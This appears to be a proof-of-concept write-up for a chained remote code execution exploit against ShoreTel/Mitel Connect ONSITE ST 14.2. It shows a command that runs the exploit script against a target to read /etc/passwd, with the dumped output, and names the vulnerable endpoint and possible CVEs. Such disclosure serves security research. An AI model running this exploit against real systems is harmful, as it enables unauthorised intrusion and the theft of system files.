There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2 which, when chained together, result in remote code execution.
Not sure this is really needed, but I’ll include it anyway.
# ./shoretel_rce.rb https://domain.com/ "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
<-- SNIP -->
I had access to a single device during the development of this PoC. As such, your system paths may be different, and you may need to edit this script to fit your needs.
I am just adding this section to assist other people who are looking for an exploit.
- ShoreTel Version 19.49.5200.0 GA27 GA28
- CVE-2018-5782 (maybe)
- CVE-2017-16251 (maybe)
- ShoreTel Connect ONSITE ST 14.2 Remote Code Execution
- scripts/vsethost.php